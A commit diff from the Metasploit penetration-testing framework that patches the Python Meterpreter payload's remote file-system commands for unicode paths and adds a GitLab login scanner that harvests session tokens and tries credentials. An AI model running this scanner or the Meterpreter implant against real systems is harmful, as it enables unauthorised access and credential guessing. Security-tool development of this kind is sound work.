sempervictus
diff --git a/‎Gemfile.lock
Lines changed: 2 additions & 2 deletions b/‎Gemfile.lock
Lines changed: 2 additions & 2 deletions
diff --git a/‎data/exploits/CVE-2014-0980.pui
16.7 KB b/‎data/exploits/CVE-2014-0980.pui
16.7 KB
diff --git a/‎data/meterpreter/ext_server_networkpug.lso
192 Bytes b/‎data/meterpreter/ext_server_networkpug.lso
192 Bytes
diff --git a/‎data/meterpreter/ext_server_sniffer.lso
160 Bytes b/‎data/meterpreter/ext_server_sniffer.lso
160 Bytes
diff --git a/‎data/meterpreter/ext_server_stdapi.lso
120 Bytes b/‎data/meterpreter/ext_server_stdapi.lso
120 Bytes
diff --git a/‎data/meterpreter/ext_server_stdapi.py
Lines changed: 25 additions & 16 deletions b/‎data/meterpreter/ext_server_stdapi.py
Lines changed: 25 additions & 16 deletions
diff --git a/‎data/meterpreter/meterpreter.py
Lines changed: 5 additions & 1 deletion b/‎data/meterpreter/meterpreter.py
Lines changed: 5 additions & 1 deletion
diff --git a/‎data/meterpreter/msflinker_linux_x86.bin
0 Bytes b/‎data/meterpreter/msflinker_linux_x86.bin
0 Bytes
diff --git a/‎lib/metasploit/framework/login_scanner/gitlab.rb
Lines changed: 96 additions & 0 deletions b/‎lib/metasploit/framework/login_scanner/gitlab.rb
Lines changed: 96 additions & 0 deletions
@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (~> 0.3.0)
       metasploit-model (~> 0.29.0)
-      meterpreter_bins (= 0.0.14)
+      meterpreter_bins (= 0.0.16)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -132,7 +132,7 @@ GEM
       pg
       railties (< 4.0.0)
       recog (~> 1.0)
-    meterpreter_bins (0.0.14)
+    meterpreter_bins (0.0.16)
     method_source (0.8.2)
     mime-types (1.25.1)
     mini_portile (0.6.1)
 
@@ -59,6 +59,7 @@
 	is_bytes = lambda obj: issubclass(obj.__class__, str)
 	bytes = lambda *args: str(*args[:1])
 	NULL_BYTE = '\x00'
+	unicode = lambda x: (x.decode('UTF-8') if isinstance(x, str) else x)
 else:
 	if isinstance(__builtins__, dict):
 		is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
@@ -69,6 +70,7 @@
 	is_bytes = lambda obj: issubclass(obj.__class__, bytes)
 	NULL_BYTE = bytes('\x00', 'UTF-8')
 	long = int
+	unicode = lambda x: (x.decode('UTF-8') if isinstance(x, bytes) else x)
 
 if has_ctypes:
 	#
@@ -530,7 +532,7 @@ def get_stat_buffer(path):
 	if hasattr(si, 'st_blocks'):
 		blocks = si.st_blocks
 	st_buf = struct.pack('<IHHH', si.st_dev, min(0xffff, si.st_ino), si.st_mode, si.st_nlink)
-	st_buf += struct.pack('<HHHI', si.st_uid, si.st_gid, 0, rdev)
+	st_buf += struct.pack('<HHHI', si.st_uid & 0xffff, si.st_gid & 0xffff, 0, rdev)
 	st_buf += struct.pack('<IIII', si.st_size, long(si.st_atime), long(si.st_mtime), long(si.st_ctime))
 	st_buf += struct.pack('<II', blksize, blocks)
 	return st_buf
@@ -630,7 +632,7 @@ def channel_open_stdapi_fs_file(request, response):
 		fmode = fmode.replace('bb', 'b')
 	else:
 		fmode = 'rb'
-	file_h = open(fpath, fmode)
+	file_h = open(unicode(fpath), fmode)
 	channel_id = meterpreter.add_channel(MeterpreterFile(file_h))
 	response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
 	return ERROR_SUCCESS, response
@@ -923,18 +925,19 @@ def stdapi_sys_process_get_processes(request, response):
 @meterpreter.register_function
 def stdapi_fs_chdir(request, response):
 	wd = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
-	os.chdir(wd)
+	os.chdir(unicode(wd))
 	return ERROR_SUCCESS, response
 
 @meterpreter.register_function
 def stdapi_fs_delete(request, response):
 	file_path = packet_get_tlv(request, TLV_TYPE_FILE_NAME)['value']
-	os.unlink(file_path)
+	os.unlink(unicode(file_path))
 	return ERROR_SUCCESS, response
 
 @meterpreter.register_function
 def stdapi_fs_delete_dir(request, response):
 	dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
+	dir_path = unicode(dir_path)
 	if os.path.islink(dir_path):
 		del_func = os.unlink
 	else:
@@ -945,7 +948,7 @@ def stdapi_fs_delete_dir(request, response):
 @meterpreter.register_function
 def stdapi_fs_delete_file(request, response):
 	file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
-	os.unlink(file_path)
+	os.unlink(unicode(file_path))
 	return ERROR_SUCCESS, response
 
 @meterpreter.register_function
@@ -971,25 +974,29 @@ def stdapi_fs_file_expand_path(request, response):
 def stdapi_fs_file_move(request, response):
 	oldname = packet_get_tlv(request, TLV_TYPE_FILE_NAME)['value']
 	newname = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
-	os.rename(oldname, newname)
+	os.rename(unicode(oldname), unicode(newname))
 	return ERROR_SUCCESS, response
 
 @meterpreter.register_function
 def stdapi_fs_getwd(request, response):
-	response += tlv_pack(TLV_TYPE_DIRECTORY_PATH, os.getcwd())
+	if hasattr(os, 'getcwdu'):
+		wd = os.getcwdu()
+	else:
+		wd = os.getcwd()
+	response += tlv_pack(TLV_TYPE_DIRECTORY_PATH, wd)
 	return ERROR_SUCCESS, response
 
 @meterpreter.register_function
 def stdapi_fs_ls(request, response):
 	path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
-	path = os.path.abspath(path)
-	contents = os.listdir(path)
-	contents.sort()
-	for x in contents:
-		y = os.path.join(path, x)
-		response += tlv_pack(TLV_TYPE_FILE_NAME, x)
-		response += tlv_pack(TLV_TYPE_FILE_PATH, y)
-		response += tlv_pack(TLV_TYPE_STAT_BUF, get_stat_buffer(y))
+	path = os.path.abspath(unicode(path))
+	dir_contents = os.listdir(path)
+	dir_contents.sort()
+	for file_name in dir_contents:
+		file_path = os.path.join(path, file_name)
+		response += tlv_pack(TLV_TYPE_FILE_NAME, file_name)
+		response += tlv_pack(TLV_TYPE_FILE_PATH, file_path)
+		response += tlv_pack(TLV_TYPE_STAT_BUF, get_stat_buffer(file_path))
 	return ERROR_SUCCESS, response
 
 @meterpreter.register_function
@@ -1008,6 +1015,7 @@ def stdapi_fs_md5(request, response):
 @meterpreter.register_function
 def stdapi_fs_mkdir(request, response):
 	dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
+	dir_path = unicode(dir_path)
 	if not os.path.isdir(dir_path):
 		os.mkdir(dir_path)
 	return ERROR_SUCCESS, response
@@ -1016,6 +1024,7 @@ def stdapi_fs_mkdir(request, response):
 def stdapi_fs_search(request, response):
 	search_root = packet_get_tlv(request, TLV_TYPE_SEARCH_ROOT).get('value', '.')
 	search_root = ('' or '.') # sometimes it's an empty string
+	search_root = unicode(search_root)
 	glob = packet_get_tlv(request, TLV_TYPE_SEARCH_GLOB)['value']
 	recurse = packet_get_tlv(request, TLV_TYPE_SEARCH_RECURSE)['value']
 	if recurse:
@@ -1056,7 +1065,7 @@ def stdapi_fs_sha1(request, response):
 @meterpreter.register_function
 def stdapi_fs_stat(request, response):
 	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
-	st_buf = get_stat_buffer(path)
+	st_buf = get_stat_buffer(unicode(path))
 	response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf)
 	return ERROR_SUCCESS, response
 
 
@@ -41,6 +41,7 @@
 	is_bytes = lambda obj: issubclass(obj.__class__, str)
 	bytes = lambda *args: str(*args[:1])
 	NULL_BYTE = '\x00'
+	unicode = lambda x: (x.decode('UTF-8') if isinstance(x, str) else x)
 else:
 	if isinstance(__builtins__, dict):
 		is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
@@ -51,6 +52,7 @@
 	is_bytes = lambda obj: issubclass(obj.__class__, bytes)
 	NULL_BYTE = bytes('\x00', 'UTF-8')
 	long = int
+	unicode = lambda x: (x.decode('UTF-8') if isinstance(x, bytes) else x)
 
 #
 # Constants
@@ -262,7 +264,9 @@ def tlv_pack(*args):
 		data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(tlv['value']))), 'UTF-8')
 	else:
 		value = tlv['value']
-		if not is_bytes(value):
+		if sys.version_info[0] < 3 and isinstance(value, __builtins__['unicode']):
+			value = value.encode('UTF-8')
+		elif not is_bytes(value):
 			value = bytes(value, 'UTF-8')
 		if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
 			data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
 
@@ -0,0 +1,96 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+      # GitLab login scanner
+      class GitLab < HTTP
+        # Inherit LIKELY_PORTS,LIKELY_SERVICE_NAMES, and REALM_KEY from HTTP
+        CAN_GET_SESSION = false
+        DEFAULT_PORT    = 80
+        PRIVATE_TYPES   = [ :password ]
+
+        # (see Base#set_sane_defaults)
+        def set_sane_defaults
+          self.uri = '/users/sign_in' if uri.nil?
+          self.method = 'POST' if method.nil?
+
+          super
+        end
+
+        def attempt_login(credential)
+          result_opts = {
+            credential: credential,
+            host: host,
+            port: port,
+            protocol: 'tcp',
+            service_name: ssl ? 'https' : 'http'
+          }
+          begin
+            cli = Rex::Proto::Http::Client.new(host,
+                                               port,
+                                               {
+                                                 'Msf' => framework,
+                                                 'MsfExploit' => framework_module
+                                               },
+                                               ssl,
+                                               ssl_version,
+                                               proxies)
+            configure_http_client(cli)
+            cli.connect
+
+            # Get a valid session cookie and authenticity_token for the next step
+            req = cli.request_cgi(
+              'method' => 'GET',
+              'cookie' => 'request_method=GET',
+              'uri'    => uri
+            )
+
+            res = cli.send_recv(req)
+
+            if res.body.include? 'user[email]'
+              user_field = 'user[email]'
+            elsif res.body.include? 'user[login]'
+              user_field = 'user[login]'
+            else
+              fail RuntimeError, 'Not a valid GitLab login page'
+            end
+
+            local_session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]
+            auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
+
+            fail RuntimeError, 'Unable to get Session Cookie' unless local_session_cookie
+            fail RuntimeError, 'Unable to get Authentication Token' unless auth_token
+
+            # Perform the actual login
+            req = cli.request_cgi(
+                                    'method' => 'POST',
+                                    'cookie' => local_session_cookie,
+                                    'uri'    => uri,
+                                    'vars_post' =>
+                                      {
+                                        'utf8' => "\xE2\x9C\x93",
+                                        'authenticity_token' => auth_token,
+                                        "#{user_field}" => credential.public,
+                                        'user[password]' => credential.private,
+                                        'user[remember_me]' => 0
+                                      }
+            )
+
+            res = cli.send_recv(req)
+            if res && res.code == 302
+              result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: res.headers)
+            else
+              result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: res)
+            end
+          rescue ::EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error => e
+            result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e)
+          ensure
+            cli.close
+          end
+          Result.new(result_opts)
+        end
+      end
+    end
+  end
+end